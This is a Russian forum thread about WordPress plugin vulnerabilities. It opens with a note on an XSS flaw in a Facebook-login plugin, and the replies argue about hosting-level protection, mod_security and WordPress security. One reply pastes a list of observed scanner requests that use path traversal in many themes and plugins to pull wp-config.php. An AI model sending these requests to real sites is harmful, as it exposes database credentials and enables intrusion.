Форум Сайтостроение Безопасность

Уязвимости в плагинах для WordPress

12 3
MaksimAlekseev
На сайте с 09.08.2013
Offline
14
MaksimAlekseev
11675

Мы регулярно следим за появлением новых уязвимостей в плагинах WordPress, и в этой ветке я хочу сообщать о самых важных из них, тех, которые установлены на большом количестве сайтов. Думаю, эта информация может быть полезна для всего сообщества и в особенности для активных разработчиков на WordPress.

Первый плагин, который затронем: Nextend Facebook Connect - https://wordpress.org/plugins/nextend-facebook-connect/

Число установок: 137,759

Версии с найденной уязвимостью: до 1.5.1

Тип уязвимости: XSS (позволяет внедрять свой скрипт или html код на сайт)

Лечение: Обновить плагин до свежей версии, в данный момент уже доступна версия 1.5.3

Хостинг сайтов с проактивной защитой от вирусов - http://yutex.ru (http://yutex.ru)
Nidora
На сайте с 20.08.2014
Offline
53
Nidora
#1

Тема интересная, буду следить за ней. Спасибо ТС.

VDS (http://vdsina.ru/?partner=1453) с SSD для профи всего за 149 руб/мес! Бонус 300 руб всем новым клиентам!
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#2
Nidora:
буду следить за ней.

Следить лучше за актуальными проблемами, а не пофиксенными полгода назад :)

А еще лучше на спец ресурсах. http://www.exploit-db.com/ например. И от доверенных лиц. Специалистов по безопасности, а не ммм.. хостеров "с проактивной защитой от вирусов".

А что бы резко сократить кол-во проблем есть золотое правило: брать всё только с оф ресурсов и вовремя обновляться. Это касается любого ПО, а не только ВП.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
MaksimAlekseev
На сайте с 09.08.2013
Offline
14
MaksimAlekseev
#3
SeVlad:
а не ммм.. хостеров "с проактивной защитой от вирусов".

Влад, у нас не только проактивная защита от вирусов, но и от XSS атак, SQL инъекций, спама в комментариях (не нужно устанавливать спец плагины wp), и ботов. То есть практически тот сервис, который предлагает CloudFlare (и кажется даже на бесплатном тарифе), но сразу на хостинге.

Касательно антивирусных баз, их несколько, актуальные уязвимости можно проверять например на http://www.cvedetails.com/ или упомянутом вами exploit-db.com, все верно, спору нет. Но мы постараемся выкладывать и рецепты лечения, на случай, если сайт уже заражен. Для продвинутых пользователей вылечить сайт не проблема, а для начинающих - морока. Постараемся ее облегчить :)

SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#4
MaksimAlekseev:
Влад,

Это кто?

MaksimAlekseev:
у нас не только проактивная защита от вирусов, но и от XSS атак, SQL инъекций

Эти макаронные изделия на уши страшные слова втирай блондинкам. А что бы не позорится - хотя почитай что такое "проактивная защита" и какое она имеет отношение к вирусам и веб-серверам.

Про "защиту от XSS атак, SQL инъекций" - не менее шедеврально :)

MaksimAlekseev:
но сразу на хостинге.

Фтопку такие хостинги!!!

MaksimAlekseev:
Постараемся ее облегчить

Для этого нужно хотя бы понимать о чём речь.

SI
На сайте с 03.12.2007
Offline
130
Sigmo#ID
#5

Сканируют ...


/wp-content/themes/ypo-theme/download.php?download=../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/Newspapertimes_1/download.php?filename=../../../../wp-config.php
/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php
/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download
/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php
/wp-content/themes/jarida/download.php?uri=../../../wp-config.php
/wp-content/themes/tess/download.php?file=../../../wp-config.php
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php
/wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php
/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php
/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php
-= Онлайн сервисы =-
MaksimAlekseev
На сайте с 09.08.2013
Offline
14
MaksimAlekseev
#6

SeVlad, С незнакомцами я предпочитаю общаться на Вы :)

Проактивная защита это та защита, которая не дает попасть вирусу, в нашем случае зачастую шелу, на сервер. А если попадает, то сразу удаляется, и не дает ему запуститься. Именно это мы и имеем ввиду, и именно такая защита у нас установлена.

XSS атаки, SQL инъекции зачастую можно отфильтровать, если сканировать трафик. Я думаю вам знаком модуль mod_security, который именно это и делает. Правда он справляется с задачей не так хорошо (из нашего опыта) и нам по тем или иным причинам не подходит, так что у нас немного другая защита, но это не столь принципиально.

Правильно фильтруя трафик можно отмести ботов и спам (намекну - через анализ POST запросов)

Удачи :)

cyberianbrain
На сайте с 16.09.2009
Offline
64
cyberianbrain
#7
SeVlad:
А что бы резко сократить кол-во проблем есть золотое правило: брать всё только с оф ресурсов и вовремя обновляться. Это касается любого ПО, а не только ВП.

т.е. премиум шаблоны с набором плагинов и супортом

SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#8
MaksimAlekseev:
С незнакомцами я предпочитаю общаться на Вы

Общайся.

MaksimAlekseev:
Проактивная защита это та защита, которая не дает попасть вирусу, в нашем случае зачастую шелу, на сервер.

Иди учи матчасть, просветитель.

MaksimAlekseev:
XSS атаки, SQL инъекции зачастую можно отфильтровать, если сканировать трафик. Я думаю вам знаком модуль mod_security, который именно это и делает.

рукалицо

cyberianbrain:
т.е. премиум шаблоны с набором плагинов и супортом

Касаемо ВП - лучше в офрепо. Там хоть перепроверено сотни раз десятками способов тысячами специалистов. И то, бывают накладки. Что уж говорить за другие ресурсы. Тем более коммерческие.

[umka]
На сайте с 25.05.2008
Offline
456
[umka]
#9
Голубая лагуна:
WP вообще одна из самых дырявых и не оптимизированных CMS.

Угу... особенно если установить тему и плагины с какого-нибудь левого сайта, да? :)

Лог в помощь!
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#10
Голубая лагуна:

WP вообще одна из самых дырявых и не оптимизированных CMS.

Обоснуешь? Или и как все, кто это "предъявляет" сольёшься?

🍿

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий